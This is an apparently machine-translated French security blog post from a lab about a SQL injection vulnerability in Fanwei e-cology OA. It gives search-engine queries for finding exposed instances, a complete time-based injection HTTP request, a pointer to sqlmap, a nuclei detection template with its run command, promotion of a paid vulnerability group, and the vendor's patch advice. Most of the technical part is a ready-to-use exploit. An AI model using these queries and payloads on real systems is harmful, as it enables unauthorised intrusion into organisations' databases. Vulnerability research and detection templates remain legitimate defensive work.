0x01 Notes de lecture
Les articles techniques de Tianqing Attack and Defense Lab sont fournis à titre de référence uniquement. Les informations fournies dans cet article sont uniquement destinées au personnel de sécurité du réseau pour tester ou maintenir les sites Web, les serveurs, etc. (y compris, mais sans s'y limiter), dont ils sont responsables. Veuillez ne pas l'utiliser sans autorisation. Les informations techniques contenues dans l'article sont utilisées pour s'introduire dans n'importe quel système informatique. Les conséquences et pertes directes ou indirectes causées par l'utilisation des informations fournies dans cet article seront à la charge de l'utilisateur lui-même. Les outils fournis dans cet article sont uniquement destinés à l’apprentissage, et toute autre utilisation est interdite ! ! !
Description de la vulnérabilité 0x02
(1) Fanwei e-cologie
Fanwei e-cology est une plateforme de gestion collaborative développée par Fanwei Network Technology, qui prend en charge la gestion multifonctionnelle des ressources humaines, des finances, de l'administration et du bureau mobile. La vulnérabilité est due au fait que Fanwei e-cology n'a pas filtré efficacement les entrées de l'utilisateur et les a directement insérées dans l'instruction de requête SQL, ce qui a entraîné une vulnérabilité d'injection SQL dans le système.
Syntaxe FOFA :
app.name=="泛微 e-cology 9.0 OA"
Syntaxe du chasseur :
app.name="泛微 e-cology 9.0 OA"
app.name="泛微 e-cology OA"
(2) Poc de vulnérabilité
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Referer: 127.0.0.1:9999/wui/index.html
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 45
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
Injecter en utilisant sqlmap
script d'analyse des noyaux
Source : https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml
id: ecology-oa-filedownloadforoutdoc-sqli
info:
name: EcologyOA filedownloadforoutdoc - SQL injection
author: unknown
severity: critical
description: EcologyOA filedownloadforoutdoc interface has SQL injection
tags: ecology-oa,sqli
requests:
- raw:
- |
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: { {Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
matchers:
- type: dsl
dsl:
- 'duration>=5'
./nuclei -u http://oa.xxx.com/ -t ./ultimaste-nuclei-templates/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml
Plus de POC de vulnérabilité publiés sur Knowledge Planet
Un thème récent pour la planète et quelques démonstrations des outils à l'intérieur de la planète
Expédition des membres d’Inner Planet
Le dernier partage d'une journée sur les vulnérabilités de sécurité Web Partage de compétences en matière d'exploration de vulnérabilités
Rejoignez la planète, veuillez rechercher le laboratoire d'offensive et de défense de Tianqing dans l'application Knowledge Planet, plus excitant, alors restez à l'écoute
Plan de réparation 0x03
Atténuation officielle des correctifs
lien de patch
-
suggestion de réparation
Le responsable a émis une suggestion de réparation, recommandant aux utilisateurs concernés de mettre à niveau vers la dernière version du correctif v10.58.0 dès que possible.
Adresse de téléchargement : https://www.weaver.com.cn/cs/securityDownload.asp#